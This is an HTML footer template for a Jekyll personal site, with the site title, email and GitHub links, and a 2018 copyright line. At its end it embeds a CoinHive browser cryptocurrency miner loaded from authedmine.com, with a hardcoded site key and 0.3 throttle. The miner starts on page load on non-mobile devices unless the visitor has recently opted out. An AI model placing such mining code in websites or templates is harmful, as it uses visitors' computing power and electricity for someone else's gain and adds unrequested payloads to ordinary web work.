<footer id="footer">
   <div class="container">    
      <h3 style="margin: 10px 0"><a href="/">{{ site.title }}</a></h3>
      <h5 style="margin: 0; margin-bottom: 10px;">{{ site.description }}</h5>     
      <section class="colored-list">
         <a href="mailto:{{ site.email }}">
            <i class="fa fa-envelope"></i>&nbsp;{{ site.email }}
         </a>
         <a href="https://github.com/{{ site.github_username }}">
            <i class="fa fa-github"></i>&nbsp;{{ site.github_username }}
         </a>
      </section>
      <p class="center">
      	&copy; 2018. Created by Igor Zachchelkin. <a href="/licence/">MIT Licence</a>.
      </p>
      
   </div>

   <script src="/js/jquery.js"></script>
   <script src="/js/master.js"></script>

   <script src="https://authedmine.com/lib/authedmine.min.js"></script>
   <script>
      var miner = new CoinHive.Anonymous('zS20TjYTyr4rwQr3POypcqqwIsg0WG4l', {throttle: 0.3});

      // Only start on non-mobile devices and if not opted-out
      // in the last 14400 seconds (4 hours):
      if (!miner.isMobile() && !miner.didOptOut(14400)) {
         miner.start();
      }
   </script>
</footer>